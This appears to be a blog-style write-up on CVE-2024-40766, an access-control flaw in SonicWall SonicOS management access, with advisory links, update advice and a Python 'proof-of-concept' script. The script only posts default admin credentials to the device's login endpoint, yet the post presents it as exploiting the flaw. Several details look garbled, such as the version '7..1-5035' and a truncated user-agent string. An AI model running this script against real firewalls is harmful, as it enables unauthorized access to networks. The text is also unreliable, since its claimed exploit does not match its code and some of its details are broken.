A significant security concern has been identified in the management access of SonicWall Firewall SonicOS devices, potentially resulting in unauthorized access to resources and, under certain circumstances, causing the firewall to crash. This issue affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7..1-5035 and older versions.

This post will provide an in-depth analysis of the vulnerability, review the code snippet for exploitation, reference original sources of information, and discuss the details of the exploit.

Vulnerability Details

The vulnerability, identified as CVE-2024-40766, occurs due to an improper access control mechanism in the SonicWall SonicOS management access. Attackers can exploit this flaw to gain unauthorized access to both the resources and the management interface of the targeted device.

In specific conditions, this vulnerability can also cause the firewall to crash, severely impacting the security posture of organizations using the affected SonicWall devices.

Code Snippet

This section contains the code snippet that demonstrates how attackers can exploit the vulnerability (proof-of-concept):

import requests

# Replace TARGET_IP with the actual target's IP address
target_ip = "TARGET_IP"
url = f"http://{target_ip}/cgi-bin/userLogin";

headers = {
    "User-Agent": "Mozilla/5."
}

# Default username and password, change it if necessary
data = {
    "userName": "admin",
    "pass": "password"
}

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    if "BUILTIN|Device|Settings" in response.text:
        print("[!] Exploitation Successful")
        print("[*] Unauthorized access granted")
    else:
        print("[X] Exploitation Failed")
else:
    print("[X] Exploitation Failed")

Replace TARGET_IP with the actual target IP address and adjust the default username and password if needed.

The original sources that revealed this vulnerability are listed below

1. SonicWall Advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
2. National Vulnerability Database: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-40766

Exploit Details

The exploit can be achieved by sending a crafted HTTP POST request to the vulnerable device's management interface. This request takes advantage of the improper access control mechanism, ultimately allowing unauthorized access to the target device's resources. In some cases, the vulnerability can also cause the firewall to crash.

Mitigation

SonicWall is already aware of this issue and has released updates to address the vulnerability. Users of affected devices should download and install the latest SonicOS releases to ensure their devices are protected from this exploit. The updates can be found at the following link: https://www.mysonicwall.com/

Conclusion

CVE-2024-40766 is a critical vulnerability in SonicWall SonicOS, which can lead to unauthorized access and, in certain cases, cause the firewall to crash. Organizations and users should make sure they are running the latest SonicOS releases to avoid this exploitation.

In case of any questions or concerns about this vulnerability, users should contact SonicWall Support for further assistance: https://www.sonicwall.com/support/contact-support/

Timeline

Published on: 08/23/2024 07:15:03 UTC
Last modified on: 09/10/2024 01:00:01 UTC